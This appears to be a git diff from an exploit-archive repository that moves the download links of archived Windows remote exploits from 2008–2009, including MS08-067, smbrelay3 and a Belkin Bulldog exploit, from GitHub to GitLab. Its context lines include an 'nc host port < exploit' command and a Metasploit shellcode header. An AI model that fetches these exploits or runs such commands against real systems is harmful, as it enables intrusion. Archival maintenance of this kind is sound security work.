a/exploits/windows/remote/5213.txt +++ b/exploits/windows/remote/5213.txt @@ -1,5 +1,5 @@ Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5213.zip (2008-versantcmd.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5213.zip (2008-versantcmd.zip) # milw0rm.com [2008-03-04] \ No newline at end of file diff --git a/exploits/windows/remote/6004.txt b/exploits/windows/remote/6004.txt index b6ffd7b86..dc19b5b7b 100644 --- a/exploits/windows/remote/6004.txt +++ b/exploits/windows/remote/6004.txt @@ -13,6 +13,6 @@ Panda has patched newest version, so update will not connect to custom ( attacke Exploit: http://karol.wiesek.pl/files/panda.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6004.tgz (2008-panda.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6004.tgz (2008-panda.tgz) # milw0rm.com [2008-07-04] \ No newline at end of file diff --git a/exploits/windows/remote/6367.txt b/exploits/windows/remote/6367.txt index c12836b5e..81dfab10e 100644 --- a/exploits/windows/remote/6367.txt +++ b/exploits/windows/remote/6367.txt @@ -22,6 +22,6 @@ and embedded systems… · Website : security.bkis.vn · Mail : svrt[at]bkav.com.vn -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6367.tgz (2008-chrome.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6367.tgz (2008-chrome.tgz) # milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/exploits/windows/remote/6656.txt b/exploits/windows/remote/6656.txt index a6f58d5ba..a3ca8690f 100644 --- a/exploits/windows/remote/6656.txt +++ b/exploits/windows/remote/6656.txt @@ -16,6 +16,6 @@ On Windows Xp Sp2 only causes Denial of service. -(Vulnerable function guarded with a GS cookie) -(The function which copies data to stack has an exception handler which recovers from access violations so u cant exploit it by hitting next page ). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6656.tgz (2008-Gdi.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6656.tgz (2008-Gdi.tgz) # milw0rm.com [2008-10-02] \ No newline at end of file diff --git a/exploits/windows/remote/6841.txt b/exploits/windows/remote/6841.txt index cb84c69c7..990ea6e19 100644 --- a/exploits/windows/remote/6841.txt +++ b/exploits/windows/remote/6841.txt @@ -1,6 +1,6 @@ MS08-067 Exploit for CN by EMM exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6841.rar (2008-MS08-067.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6841.rar (2008-MS08-067.rar) # milw0rm.com [2008-10-26] \ No newline at end of file diff --git a/exploits/windows/remote/7125.txt b/exploits/windows/remote/7125.txt index d90560f62..67a8c21e9 100644 --- a/exploits/windows/remote/7125.txt +++ b/exploits/windows/remote/7125.txt @@ -2,6 +2,6 @@ * (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com ) * URL: http://tarasco.org/Web/tools.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7125.zip (2008-smbrelay3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7125.zip (2008-smbrelay3.zip) # milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/exploits/windows/remote/7403.txt b/exploits/windows/remote/7403.txt index b3b6b24ea..7d518ab7a 100644 --- a/exploits/windows/remote/7403.txt +++ b/exploits/windows/remote/7403.txt @@ -4,6 +4,6 @@ // http://www.metasploit.com // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7403.zip (2008-iesploit.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7403.zip (2008-iesploit.tar.gz) # milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/exploits/windows/remote/8173.txt b/exploits/windows/remote/8173.txt index c0f533c47..891b62411 100644 --- a/exploits/windows/remote/8173.txt +++ b/exploits/windows/remote/8173.txt @@ -8,6 +8,6 @@ nc host port < belkin-buldog-exploit Thats all folks! -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8173.zip (2009-belkin-bulldog-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8173.zip (2009-belkin-bulldog-exploit.zip) # milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/exploits/windows/remote/8704.txt b/exploits/windows/remote/8704.txt index 635e465e9..97ef8daa4 100644 --- a/exploits/windows/remote/8704.txt +++ b/exploits/windows/remote/8704.txt @@ -40,7 +40,7 @@ #### ###### ### ############### # ### -archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8704.pdf (2009-IIS-Advisory.pdf) +archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8704.pdf (2009-IIS-Advisory.pdf) *** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE *** diff --git a/exploits/windows/remote/8938.txt b/exploits/windows/remote/8938.txt index c4f8d35fa..2dcdb89f1 100644 --- a/exploits/windows/remote/8938.txt +++ b/exploits/windows/remote/8938.txt @@ -12,6 +12,6 @@ to bypass DEP and ASLR on Vista. The exploit page contains a .net control, so it should be published on IIS. ---seer[N.N.U] -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8938.zip (2009-green-dam.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8938.zip (2009-green-dam.zip) # milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/exploits/windows/remote/986.html b/exploits/windows/remote/986.html index f97f5d4d2..19a1ab938 100644 --- a/exploits/windows/remote/986.html +++ b/exploits/windows/remote/986.html @@ -1,5 +1,5 @@